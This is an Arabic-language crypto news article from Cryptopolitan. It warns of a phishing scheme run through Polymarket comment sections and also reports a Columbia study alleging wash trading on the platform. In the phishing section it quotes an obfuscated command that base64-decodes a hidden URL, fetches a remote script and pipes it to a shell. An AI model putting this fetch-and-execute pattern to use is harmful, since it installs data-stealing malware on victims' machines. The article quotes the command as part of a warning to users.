Your bank is using your money. You’re getting the scraps.WATCH FREE

روابط التصيد الاحتيالي في الأسواق الخاصة لشركة بولي ماركت: المستخدمون يحذرون

في هذا المنشور:

  • أعرب مستخدمو منصة X عن مخاوفهم بشأن السوق الخاص لمنصة Polymarket، زاعمين أنه يتم استغلاله من قبل المتسللين. 
  • وبحسب التقارير، سرق المتسللون أكثر من 500 ألف دولار من خلال العمل في أقسام التعليقات على موقع بولي ماركت.
  • لم يمض سوى أيام قليلة على إعلان باحثي جامعة كولومبيا أن حجم التداول في منصة بولي ماركت مدعوم بعمليات تداول وهمية يقوم بها المستخدمون. 

تتصدر منصة Polymarket عناوين الأخبار مرة أخرى، وهذه المرة لأن أحد كبار المتداولين فيها، والذي يحمل لقب "25usdc"، دق ناقوس الخطر بشأن مخطط يستخدم قسم التعليقات في المنصة لاصطياد المستخدمين غير المشتبه بهم. 

يحدث هذا في وقت حاسم بالنسبة لمنصة Polymarket حيث تستعد لإعادة دخول السوق الأمريكية وتكافح من أجل التفوق على منافسيها مثل Kalshi. 

روابط التصيد الاحتيالي في الأسواق الخاصة لشركة بولي ماركت: المستخدمون يحذرون.
لقطة شاشة لرسالة نموذجية من مخترق يُعيد توجيه مستخدمي Polymarket للنقر على روابط تصيّد احتيالي. المصدر: @25usdc عبر X/Twitter .

تجار سوق البولي ماركت في حالة تأهب قصوى 

بحسب موقع 25usdc ، يستخدم المتسللون قسم التعليقات في موقع Polymarket لتنفيذ عملية احتيال، وحتى الآن، خسر المستخدمون أكثر من 500 ألف دولار.

كتب 25usdc: "يقولون: 'لماذا لا تتداول في أسواق Polymarket الخاصة؟ الاحتمالات دائماً أفضل بكثير هناك!'"، قبل أن يشرح كيف تعمل عملية الاحتيال بأكملها. 

بحسب قوله، يبدأ الأمر بشراء أسهم "نعم" و"لا" في السوق من حسابين منفصلين. وبهذه الطريقة، تبقى تعليقاتهم موجودة حتى عند تفعيل فلتر "الحائزين". بعد ذلك، ينشرون رابط موقعهم الإلكتروني بشكل مُشفر.

ينقل الرابط المستخدم غير المتوقع إلى صفحة ذات مظهر أنيق تحمل شعار Polymarket، ويطلب منه تسجيل الدخول عبر البريد الإلكتروني. بمجرد التحقق من البريد الإلكتروني، تظهر نافذة جديدة تطلب من المستخدم تأكيد نشاطه، محاكيةً بذلك موقع CloudFlare. 

ومع ذلك، يقول موقع 25usdc أنه عند النقر على "نسخ"، يتم نسخ أمر يشبه هذا "curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh" بدلاً من ذلك، وأول شيء يفعله، إذا ارتكب المستخدم خطأ لصقه في طرفية الجهاز، هو فك تشفير السلسلة المشفرة بـ base64 (عنوان URL للخادم)، وبعد ذلك يجلب برنامجًا نصيًا من ذلك الخادم وينفذه على الفور. 

انظر أيضًا:  روسيا تتجنب العقوبات الأمريكية والأوروبية باستخدام العملات المشفرة

يمكن أن يحتوي النص البرمجي المعني على أي شيء، وبحسب ما ورد لن يكون هناك تحذير منبثق، وعند هذه النقطة يكون الضرر قد وقع، والحل الوحيد وفقًا لـ 25usdc قد يكون إيقاف تشغيل شبكة Wi-Fi. 

وكتب موقع 25usdc: "في النهاية، يجمعون البيانات، ويسجلون كل شيء على نظامك، ويرسلون ملفًا مضغوطًا إلى خادمهم. ثم يستخدمون هذه البيانات للدخول إلى حساباتك وسرقة أموالك."

ومن الأمور الأخرى التي لاحظها مدى دقة عمل المجموعة؛ فعلى سبيل المثال، يقومون بإخفاء آثارهم عن طريق تبديل المحافظ بشكل متكرر، والتشويش في كل خطوة من خطواتهم، بل ويقومون بإيقاف تشغيل الخادم الذي يرسل الحمولات ويستقبل البيانات المسجلة عندما لا يكون هناك ضحية نشطة.

وخلص 25usdc إلى القول: "أعتقد أن أفضل طريقة لمعالجة هذا الأمر هي السماح للمستخدمين الموثوق بهم بمراجعة التعليقات أو إدخال نظام تصويت سلبي يخفي المنشورات التي حصلت على عدد كبير من الأصوات السلبية"، مشيرًا إلى أن التحذير الذي يعرضه موقع Polymarket حاليًا لن يكون كافيًا.

دراسة جديدة تزعم أن حجم التداول في منصة بولي ماركت مدعوم بعمليات تداول وهمية

كريبتوبوليتانCryptopolitan أفادت دراسة نُشرت مؤخراً من قبل باحثين من جامعة كولومبيا أن حجم النشاط في منصة Polymarket قد تم تضخيمه بشكل كبير من خلال عمليات التداول الوهمية.

وقد تباينت "التداولات المصطنعة"، كما وصفها المؤلفون، بمرور الوقت، لكنهم يقولون إنها شكلت ما متوسطه 25٪ من جميع عمليات الشراء والبيع على منصة Polymarket على مدى السنوات الثلاث الماضية. 

انظر أيضًا:  Aave DAO تقيّم حدود DAI وسط مخاوف بشأن استقرار eUSD

لم تخضع الورقة لمراجعة الأقران ولكنها موجودة بالفعل على منصة البحث ذات الوصول المفتوح SSRN وتخضع للمراجعة من قبل Polymarket. 

للتوضيح، لم يتهم المؤلفون منصة بولي ماركت نفسها صراحةً بالتداول الوهمي. مع ذلك، فقد سلطوا الضوء على عناصر في هيكل المنصة القائم على العملات المشفرة تجعل هذا الادعاء معقولاً.

وقد أشاروا أيضاً إلى أن عملاء الشركة ربما انخرطوا بشكلdentفي عمليات التداول الوهمي المذكورة في محاولة لتحسين فرصهم في الحصول على رمز رقمي خاص ألمح مؤسس الشركة، شاين كوبلان، إلى إمكانية إطلاقه في 8 أكتوبر الماضي. 

قال ياش كانوريا، الأستاذ في كلية إدارة الأعمال بجامعة كولومبيا وأحد المؤلفين الأربعة المشاركين في الورقة البحثية، في رسالة بريد إلكتروني: "آمل أن ترحب شركة بولي ماركت بالتحليل الوارد في ورقتنا البحثية. فالتداول الوهمي لا يضيف سيولة أو معلومات إلى السوق، لذا يبدو من المهم التمييز بين حجم التداول الحقيقي وغير الحقيقي"

إذا كان جزء من حجم شركة بولي ماركت "وهميًا" حقًا، فإن الدراسة تزعم أنه قد يغير فهم قوة بولي ماركت النسبية في الصناعة، كما أنه يقوض الفكرة الحالية القائلة بأن أسواق التنبؤ تعكس "حكمة جمهور أكبر"

وخلص المؤلفون إلى أن "إمكانية حدوث عمليات تداول وهمية واسعة النطاق تعني أن حجم التداول قد لا يكون مقياسًا موثوقًا به لنشاط المنصة الحقيقي، لا سيما في منصات التداول القائمة على العملات المشفرة والتي قد لا تمتلك ضمانات مناسبة".

يستغل مصرفك أموالك، ولا تحصل إلا على الفتات. شاهد الفيديو المجاني الخاص بنا حول كيفية إدارة أموالك بنفسك.

رابط المشاركة:

إخلاء مسؤولية: المعلومات الواردة هنا ليست نصيحة استثمارية. موقع Cryptopolitan أي مسؤولية عن أي استثمارات تتم بناءً على المعلومات الواردة في هذه الصفحة. ننصح tron بإجراء بحث مستقل dent /أو استشارة مختص مؤهل قبل اتخاذ أي قرارات استثمارية.

الأكثر قراءة

جارٍ تحميل المقالات الأكثر قراءة...

ابقَ على اطلاع دائم بآخر أخبار العملات الرقمية، واحصل على تحديثات يومية في بريدك الإلكتروني

اختيار المحرر

جارٍ تحميل مقالات مختارة من قبل المحرر...

- النشرة الإخبارية الخاصة بالعملات الرقمية التي تُبقيك في الصدارة -

تتحرك الأسواق بسرعة.

نتحرك بشكل أسرع.

اشترك في النشرة اليومية Cryptopolitan واحصل على تحليلات دقيقة ومناسبة وفي الوقت المناسب حول العملات المشفرة مباشرة إلى بريدك الوارد.

انضم الآن ولن
تفوتك أي خطوة.

ادخل. احصل على الحقائق.
تقدم للأمام.

اشترك في CryptoPolitan